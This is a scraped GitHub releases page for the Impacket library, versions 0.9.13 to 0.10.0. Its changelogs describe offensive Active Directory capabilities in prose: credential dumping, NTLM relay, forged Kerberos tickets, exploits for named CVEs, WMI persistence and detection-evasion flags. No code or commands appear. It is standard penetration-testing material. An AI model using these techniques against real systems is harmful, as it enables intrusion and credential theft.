keylistattack.py: This example implements the Kerberos Key List attack to dump credentials abusing RODCs and Azure AD Kerberos Servers (@0xdeaddood)

As always, thanks a lot to all these contributors that make this library better every day (since last version):

@rmaksimov @simondotsh @CCob @raithedavion @SAERXCIT @Maltemo @dirkjanm @reznok @ShutdownRepo @scopedsecurity @Tw1sm @nodauf @p0dalirius @zblurx @hugo-syn @capnkrunchy @mohemiv @mpgn @rtpt-jonaslieb @snovvcrash @Alef-Burzmali @ThePirateWhoSmellsOfSunflowers @jlvcm
Source code(tar.gz)
Source code(zip)
impacket-0.10.0.tar.gz(1.37 MB)
impacket_0_9_24(Oct 27, 2021)
Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

ChangeLog for 0.9.24:

Library improvements

Fixed WMI objects parsing (@franferrax)

Added the RpcAddPrinterDriverEx method and related structures to [MS-RPRN]: Print System Remote Protocol (@cube0x0)

Initial implementation of [MS-PAR]: Print System Asynchronous Remote Protocol (@cube0x0)

Complying MS-RPCH with HTTP/1.1 (@mohemiv)

Added return of server time in case of Kerberos error (@ShutdownRepo and @Hackndo)

Examples improvements

getST.py:

Added support for a custom additional ticket for S4U2Proxy (@ShutdownRepo)

ntlmrelayx.py:

Added Negotiate authentication support to the HTTP server (@LZD-TMoreggia)

Added anonymous session handling in the HTTP server (@0xdeaddood)

Fixed error in ldapattack.py when trying to escalate with machine account (@Rcarnus)

Added the implementation of AD CS attack (@ExAndroidDev)

Disabled the anonymous logon in the SMB server (@ly4k)

psexec.py:

Fixed decoding problems on multi bytes characters (@p0dalirius)

reg.py:

Implemented ADD and DELETE functionalities (@Gifts)

secretsdump.py:

Speeding up NTDS parsing (@skelsec)

smbclient.py:

Added 'mget' command which allows the download of multiple files (@deadjakk)

Handling empty search count in FindFileBothDirectoryInfo (@martingalloar)

smbpasswd.py:

Added the ability to change a user's password providing NTLM hashes (@snovvcrash)

smbserver.py:

Added NULL SMBv2 client connection handling (@0xdeaddood)

Hardened path checks and Added TID checks (@martingalloar)

Added SMB2 support to QUERY_INFO Request and Enabled SMB_COM_FLUSH method (@0xdeaddood)

Added missing constant and structure for the QUERY_FS Information Level SMB_QUERY_FS_DEVICE_INFO (@martingalloar)

wmipersist.py:

Fixed VBA script execution and improved error checking (@franferrax)

New examples

rbcd.py: Example script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer (@ShutdownRepo and @p0dalirius) (based on the previous work of @tothi and @NinjaStyle82)

As always, thanks a lot to all these contributors that make this library better every day (since last version):

@deadjakk @franferrax @cube0x0 @w0rmh013 @skelsec @mohemiv @LZD-TMoreggia @exploide @ShutdownRepo @Hackndo @snovvcrash @rmaksimov @Gifts @Rcarnus @ExAndroidDev @ly4k @p0dalirius
Source code(tar.gz)
Source code(zip)
impacket-0.9.24.tar.gz(1.57 MB)
impacket_0_9_23(Jun 9, 2021)
Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

ChangeLog for 0.9.23:

Library improvements

Support connect timeout with SMBTransport (@vruello)

Speeding up DcSync (@mohemiv)

Fixed Python3 issue when serving SOCKS5 requests (@agsolino)

Moved docker container to Python 3.8 (@mgallo)

Added basic GitHub Actions workflow (@mgallo)

Fixed Path Traversal vulnerabilities in smbserver.py - CVE-2021-31800 (@omriinbar AppSec Researcher at CheckMarx)

Fixed POST request processing in httprelayserver.py (@Rcarnus)

Added cat command to smbclient.py (@mxrch)

Added new features to the LDAP Interactive Shell to facilitate AD exploitation (@AdamCrosser)

Python 3.9 support (@meeuw and @cclauss)

Examples improvements

addcomputer.py:

Enable the machine account created via SAMR (@0xdeaddood)

getST.py:

Added exploit for CVE-2020-17049 - Kerberos Bronze Bit attack (@jakekarnes42)

Compute NTHash and AESKey for the Bronze Bit attack automatically (@snovvcrash)

ntlmrelayx.py:

Fixed target parsing error (@0xdeaddood)

wmipersist.py:

Fixed filterBinding error (@franferrax)

Added PowerShell option for semi-interactive shells in dcomexec.py, smbexec.py and wmiexec.py (@snovvcrash)

Added new parameter to select COMVERSION in dcomexec.py, wmiexec.py, wmipersist.py and wmiquery.py (@zexusx26)

New examples

Get-GPPPassword.py: This example extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline (@ShutdownRepo and @p0dalirius)

smbpasswd.py: This script is an alternative to smbpasswd tool and intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR) (@snovvcrash)

As always, thanks a lot to all these contributors that make this library better every day (since last version):

@mpgn @vruello @mohemiv @jagotu @jakekarnes42 @snovvcrash @zexusx26 @omriinbar @Rcarnus @nuschpl @mxrch @ShutdownRepo @p0dalirius @AdamCrosser @franferrax @meeuw and @cclauss
Source code(tar.gz)
Source code(zip)
impacket-0.9.23.tar.gz(1.32 MB)
impacket_0_9_22(Nov 23, 2020)
Project's main page at https://www.secureauth.com/labs/impacket/

ChangeLog for 0.9.22:

Library improvements

Added implementation of RPC over HTTP v2 protocol (by @mohemiv).

Added MS-NSPI, MS-OXNSPI and MS-OXABREF protocol implementations (by @mohemiv).

Improved the multi-page results in LDAP queries (by @ThePirateWhoSmellsOfSunflowers).

NDR parser optimization (by @mohemiv).

Improved serialization of WMI method parameters (by @tshmul).

Introduce the MS-NLMP 2.2.2.10 VERSION structure in NTLMAuthNegotiate messages (by @franferrax).

Added some NETLOGON structs for NetrServerPasswordSet2 (by @dirkjanm).

Python 3.8 support.

Examples improvements

atexec.py: Fixed after MS patches related to RPC attacks (by @mohemiv).

dpapi.py: Added -no-pass, pass-the-hash and AES Key support for backup subcommand.

GetNPUsers.py: Added ability to enumerate targets with Kerberos KRB5CC (by @rmaksimov).

GetUserSPNs.py: Added new features for kerberoasting (by @mohemiv).

ntlmrelayx.py:

Added ability to relay on new Windows versions that have SMB guest access disabled by default.

Added option to specify the NTLM Server Challenge used when receiving a connection.

Added relaying to RPC support (by @mohemiv).

Implemented WCFRelayServer (by @cnotin).

Added Zerologon DCSync Relay Client (by @dirkjanm).

Fixed issue in ldapattack.py when relaying and creating computer in CN=Computers (by @Hackndo).

rpcdump.py: Added RPC over HTTP v2 support (by @mohemiv).

secretsdump.py:

Added ability to specifically delete a shadow based on its ID (by @phefley).

Dump plaintext machine account password when dumping the local registry secrets(by @dirkjanm).

New examples

exchanger.py: A tool for connecting to MS Exchange via RPC over HTTP v2 (by @mohemiv).

rpcmap.py: Scan for listening DCE/RPC interfaces (by @mohemiv).

As always, thanks a lot to all these contributors that make this library better every day (since last version): @mohemiv @mpgn @Romounet @ThePirateWhoSmellsOfSunflowers @rmaksimov @fuzzKitty @tshmul @spinenkoia @AaronRobson @ABCIFOGeowi40 @cclauss @cnotin @5alt @franferrax @Dliv3 @dirkjanm @Mr-Gag @vbersier @phefley @Hackndo
Source code(tar.gz)
Source code(zip)
impacket-0.9.22.tar.gz(1.30 MB)
impacket_0_9_21(Mar 26, 2020)
Project's main page at www.secureauth.com

ChangeLog for 0.9.21:

Library improvements

New methods into CCache class to import/export kirbi (KRB-CRED) formatted tickets (by @Zer1t0).

Add FSCTL_SRV_ENUMERATE_SNAPSHOTS functionality to SMBConnection (by @rxwx).

Changes in NetBIOS classes in nmb.py (select() by poll() read from socket) (by @cnotin).

Timestamped logging added.

Interactive shell to perform LDAP operations (by @mlefebvre).

Added two DCE/RPC calls in tsch.py (by @mohemiv).

Single-source the version number and standardize on symantic + pre-release + local versioning (by @jsherwood0).

Added implementation for keytab files (by @kcirtapw).

Added SMB 3.1.1 support for Client SMB Connections.

Examples improvements

smbclient.py: List the VSS snapshots for a specified path (by @rxwx).

GetUserSPNs.py: Added delegation information associated with accounts (by @G0ldenGunSec).

dpapi.py:

Added more functions to decrypt masterkeys based on SID + hashes/key. Also support supplying hashes instead of the password for decryption(by @dirkjanm).

Pass the hash support for backup key retrieval (by @imaibou).

Added feature to decrypt a user's masterkey using the MS-BKRP (by @imaibou).

raiseChild.py: Added a new flag to specify the RID of a user to dump credentials (by @0xdeaddood).

Added flags to bypass badly made detection use cases (by @MaxNad):

smbexec.py: Possibility to rename the PSExec uploaded binary name with the -remote-binary-name flag.

psexec.py: Possibility to use another service name with the -service-name flag.

ntlmrelayx.py:

Added a flag to use a SID as the escalate user for delegation attacks(by @0xe7).

Support for dumping LAPS passwords (by @praetorian-adam-crosser).

Added LDAP interactive mode that allow an attacker to manually perform basic operations like creating a new user, adding a user to a group , dump the AD, etc. (by @mlefebvre).

Support for multiple relays through one SMB connection (by @0xdeaddood).

Added support for dumping gMSA passwords (by @cube0x0).

ticketer.py: Added an option to use the SPNs keys from a keytab for a silver ticket.(by @kcirtapw)

New Examples

addcomputer.py: Allows add a computer to a domain using LDAP or SAMR (SMB) (by @jagotu)

ticketConverter.py: This script converts kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa (by @Zer1t0).

findDelegation.py: Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment (by @G0ldenGunSec).

As always, thanks a lot to all these contributors that make this library better every day (since last version):

@jagotu, @Zer1t0 ,@rxwx, @mpgn, @danhph, @awsmhacks, @slasyz, @cnotin, @exploide, @G0ldenGunSec, @dirkjanm, @0xdeaddood, @MaxNad, @imaibou, @BarakSilverfort, @0xe7, @mlefebvre, @rmaksimov, @praetorian-adam-crosser, @jsherwood0, @mohemiv, @justin-p, @cube0x0, @spinenkoia, @kcirtapw, @MrAnde7son, @fridgehead, @MarioVilas.
Source code(tar.gz)
Source code(zip)
impacket-0.9.21.tar.gz(1.21 MB)
impacket_0_9_20(Sep 25, 2019)
Project's main page at www.secureauth.com

ChangeLog for 0.9.20:

Library improvements

Python 3.6 support! This is the first release supporting Python 3.x so please issue tickets whenever you find something not working as expected. Libraries and examples should be fully functional.

Test coverage improvements by @infinnovation-dev

Anonymous SMB 2.x Connections are not encrypted anymore (by @cnotin)

Support for multiple PEKs when decrypting Windows 2016 DIT files (by @mikeryan)

Examples improvements

ntlmrelayx.py:

CVE-2019-1019: Bypass SMB singing for unpatched (by @msimakov)

Added POC code for CVE-2019-1040 (by @dirkjanm)

Added NTLM relays leveraging Webdav authentications (by @salu90)

New Examples

kintercept.py: A tool for intercepting krb5 connections and for testing KDC handling S4U2Self with unkeyed checksum (by @iboukris)

As always, thanks a lot to all these contributors that make this library better every day (since last version): @infinnovation-dev, @cnotin, @mikeryan, @SR4ven, @cclauss, @skorov, @msimakov, @dirkjanm, @franferrax, @iboukris, @n1ngod, @c0d3z3r0, @MrAnde7son.
Source code(tar.gz)
Source code(zip)
impacket-0.9.20.tar.gz(3.69 MB)
impacket_0_9_19(Apr 1, 2019)
Project's main page at www.secureauth.com

ChangeLog for 0.9.19:

Library improvements

[MS-EVEN] Interface implementation (Initial - by @MrAnde7son )

Examples improvements

ntlmrelayx.py:

Socks local admin check (by @imaibou)

Add Resource Based Delegation features (by @dirkjanm)

smbclient.py: Added ability to create/remove mount points to exploit James Forshaw's Abusing Mount Points over the SMB Protocol technique. (by @Qwokka)

GetST.py: Added resource-based constrained delegation support to S4U (@eladshamir )

GetNPUsers.py: Added hashcat/john format and users file input (by @Zer1t0 )

As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @MrAnde7son, @ibo, @franferrax, @Qwokka, @CaledoniaProject , @eladshamir, @Zer1t0, @martingalloar, @muizzk, @Petraea, @SR4ven, @Fist0urs, @Zer1t0
Source code(tar.gz)
Source code(zip)
impacket-0.9.19.tar.gz(1.17 MB)
impacket_0_9_18(Dec 5, 2018)
Project's main page at www.secureauth.com

ChangeLog for 0.9.18:

Library improvements

Replace unmaintained PyCrypto for pycryptodome (@dirkjanm)

Using cryptographically secure pseudo-random generators

Kerberos "no pre-auth and RC4" handling in GetKerberosTGT (by @qlemaire)

Test cases adjustments, travis and flake support (@cclauss)

Python3 test cases fixes (@eldipa)

Adding DPAPI / Vaults related structures and functions to decrypt secrets.

[MS-RPRN] Interface implementation (Initial)

Examples improvements

ntlmrelayx.py: Optimize ACL enumeration and improve error handling in ntlmrelayx LDAP attack (by @dirkjanm)

secretsdump.py: Added dumping of machine account Kerberos keys (@dirkjanm). DPAPI_SYSTEM LSA Secret is now parsed and key contents are shown.

GetUserSPNs.py: Bugfixes and cross-domain support (@dirkjanm)

New Examples

dpapi.py: Allows decrypting vaults, credentials and masterkeys protected by DPAPI. Domain backup key support added by @MrAnde7son

As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @MrAnde7son, @franferrax, @MrRobot86, @qlemaire, @cauan, @eldipa
Source code(tar.gz)
Source code(zip)
impacket-0.9.18.tar.gz(1.16 MB)
impacket_0_9_17(May 30, 2018)
Project's main page at www.coresecurity.com

ChangeLog for 0.9.17:

Library improvements

New [MS-PAC] Implementation.

LDAP engine: Added extensibleMatch string filter parsing, simple paging support and handling of unsolicited notification (by @kacpern)

ImpactDecoder: Add EAPOL, BOOTP and DHCP packet decoders (by Michael Niewoehner)

Kerberos engine: DES-CBC-MD5 support to kerberos added (by @skelsec)

SMB3 engine: If target server supports SMB >= 3, encrypt packets by default.

Initial [MS-DHCPM] and [MS-EVEN6] Interface implementation by @MrAnde7son

Major improvements to the NetBIOS layer. More use of structure.py in there.

MQTT Protocol Implementation and example.

Tox/Coverage Support added, test cases moved to its own directory. Major overhaul.

Many fixes and improvements in Kerberos, SMB and DCERPC (too much to name in a few lines).

Examples improvements

GetUserSPNs.py: -request-user parameter added. Requests STs for the SPN associated to the user specified. Added support for AES Kerberoast tickets (by @elitest).

services.py: added port 139 support and related options (by @real-datagram).

samrdump.py: -csv switch to output format in CSV added.

ntlmrelayx.py: Major architecture overhaul. Now working mostly through dynamically loaded plugins. SOCKS proxy support for relayed connections. Specific attacks for every protocol and new protocols support (IMAP, POP3, SMTP). Awesome contributions by @dirkjanm.

secretsdump.py : AES(128) support for SAM hashes decryption. OldVal parameter dump added to LSA secrets dump (by @Ramzeth).

mssqlclient.py: Alternative method to execute cmd's on MSSQL (sp_start_job). (by @Kayzaks).

lsalookupsid.py: added no-pass and domain-users options (by @ropnop).

New Examples

ticketer.py: Create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, extrasids, duration, etc. Silver tickets creation by @machosec and @bransh.

GetADUsers.py: Gathers data about the domain's users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes.

getPac.py: Gets the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.

getArch.py: Will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.

mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi.

sambaPipe.py: Will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.

dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. (contributions by @byt3bl33d3r).

getTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.

getST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf other user.

As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @real-datagram, @kacpern, @martinuy, @xelphene, @blark, @the-useless-one, @contactr2m, @droc, @martingalloar, @skelsec, @franferrax, @Fr0stbyt3, @ropnop, @MrAnde7son, @machosec, @federicoemartinez, @elitest, @symeonp, @Kanda-Motohiro, @Ramzeth, @mohemiv, @arch4ngel, @derekchentrendmicro, @Kayzaks, @donwayo, @bao7uo, @byt3bl33d3r, @xambroz, @luzpaz, @TheNaterz, @Mikkgn, @derUnbekannt.
Source code(tar.gz)
Source code(zip)
impacket_0_9_15(Jun 28, 2016)
Project's main page at www.coresecurity.com

ChangeLog for 0.9.15:

Library improvements

SMB3.create(): define CreateContextsOffset and CreateContextsLength when applicable (by @rrerolle)

Retrieve user principal name from CCache file allowing to call any script with -k and just the target system (by @MrTchuss)

Packet fragmentation for DCE RPC layer mayor overhaul.

Improved pass-the-key attacks scenarios (by @skelsec)

Adding a minimalistic LDAP/s implementation (supports PtH/PtT/PtK). Only search is available (and you need to build the search filter yourself)

IPv6 improvements for DCERPC/LDAP and Kerberos

Examples improvements

Adding -dc-ip switch to all examples. It allows to specify what the IP for the domain is. It assumes the DC and KDC resides in the same server

secretsdump.py

Adding support for Win2016 TP4 in LOCAL or -use-vss mode

Adding -just-dc-user switch to download just a single user data (DRSUAPI mode only)

Support for different ReplEpoch (DRSUAPI only)

pwdLastSet is also included in the output file

New structures/flags added for 2016 TP5 PAM support

wmiquery.py

Adding -rpc-auth-level switch (by @gadio)

smbrelayx.py

Added option to specify authentication status code to be sent to requesting client (by @mgeeky)

Added one-shot parameter. After successful authentication, only execute the attack once for each target (per protocol)

New Examples

GetUserSPNs.py: This module will try to find Service Principal Names that are associated with normal user account. This is part of the kerberoast attack researched by Tim Medin (@timmedin)

ntlmrelayx.py: smbrelayx.py on steroids!. NTLM relay attack from/to multiple protocols (HTTP/SMB/LDAP/MSSQL/etc) (by @dirkjanm)

Source code(tar.gz)
Source code(zip)
impacket-0.9.15.tar.gz(1.02 MB)
impacket_0_9_14(Jan 7, 2016)
Library improvements:

[MS-TSCH] - ATSVC, SASec and ITaskSchedulerService Interface implementations

[MS-DRSR] - Directory Replication Service DRSUAPI Interface implementation

Network Data Representation (NDR) runtime overhaul. Big performance and reliability improvements achieved

Unicode support (optional) for the SMBv1 stack (by @rdubourguais)

NTLMv2 enforcement option on SMBv1 client stack (by @scriptjunkie)

Kerberos support for TDS (MSSQL)

Extended present flags support on RadioTap class

Old DCERPC runtime code removed

Examples improvements:

mssqlclient.py: Added Kerberos authentication support

atexec.py: It now uses ITaskSchedulerService interface, adding support for Windows 2012 R2

smbrelayx.py:

If no file to upload and execute is specified (-E) it just dumps the target user's hashes by default

Added -c option to execute custom commands in the target (by @byt3bl33d3r)

secretsdump.py:

Active Directory hashes/Kerberos keys are dumped using [MS-DRSR]-(IDL_DRSGetNCChanges method) by default. VSS method is still available by using the -use-vss switch

Added -just-dc (Extract only NTDS.DIT NTLM Hashes and Kerberos) and -just-dc-ntlm ( only NTDS.DIT NTLM Hashes ) options

Added resume capability (only for NTDS in DRSUAPI mode) in case the connection drops. Use -resumefile option

Added Primary:CLEARTEXT Property from supplementalCredentials attribute dump

Add support for multiple password encryption keys (PEK) (by @s0crat)

goldenPac.py: Tests all DCs in domain and adding forest's enterprise admin group inside PAC

New examples:

raiseChild.py: Child domain to forest privilege escalation exploit. Implements a child-domain to forest privilege escalation as detailed by Sean Metcalf (@PyroTek3) at https://adsecurity.org/?p=1640. It (ab)uses the concept of Golden Tickets and ExtraSids researched and implemented by Benjamin Delpy (@gentilkiwi) in mimikatz

netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them (original idea by @mubix)

Source code(tar.gz)
Source code(zip)
impacket-0.9.14.tar.gz(1013.87 KB)
impacket_0_9_13(May 4, 2015)
May 2015 - 0.9.13:

Library improvements

Kerberos support for SMB and DCERPC featuring:

a. kerberosLogin() added to SMBConnection (all SMB versions). b. Support for RPC_C_AUTHN_GSS_NEGOTIATE at the DCERPC layer. This will negotiate Kerberos. This also includes DCOM. c. Pass-the-hash, pass-the-ticket and pass-the-key support. d. Ccache support, compatible with Kerberos utilities (kinit, klist, etc). e. Support for RC4, AES128_CTS_HMAC_SHA1_96 and AES256_CTS_HMAC_SHA1_96 ciphers. f. Support for RPC_C_AUTHN_LEVEL_PKT_PRIVACY/RPC_C_AUTHN_LEVEL_PKT_INTEGRITY.

SMB3 encryption support. Pycrypto experimental version that supports AES_CCM is required.

[MS-SAMR]: Supplemental Credentials support (used by secretsdump.py)

SMBSERVER improvements:

a. SMB2 (2.002) dialect experimental support. b. Adding capability to export to John The Ripper format files

Library logging overhaul. Now there's a single logger called 'impacket'.

Examples improvements:

Added Kerberos support to all modules (incl. pass-the-ticket/key)

Ported most of the modules to the new dcerpc.v5 runtime.

secretsdump.py: Added dumping Kerberos keys when parsing NTDS.DIT

smbserver.py: support for SMB2 (not enabled by default)

smbrelayx.py: Added support for MS15-027 exploitation.

New examples:

goldenPac.py: MS14-068 exploit. Saves the golden ticket and also launches a psexec session at the target.

karmaSMB.py: SMB Server that answers specific file contents regardless of the SMB share and pathname requested.

wmipersist.py: Creates persistence over WMI. Adds/Removes WMI Event Consumers/Filters to execute VBS based on a WQL filter or timer specified.

netview.py: Gets a list of the sessions opened at the remote hosts looping over the hosts found keeping track of who logged in/out from remote servers

Source code(tar.gz)
Source code(zip)
impacket-0.9.13.tar.gz(1018.32 KB)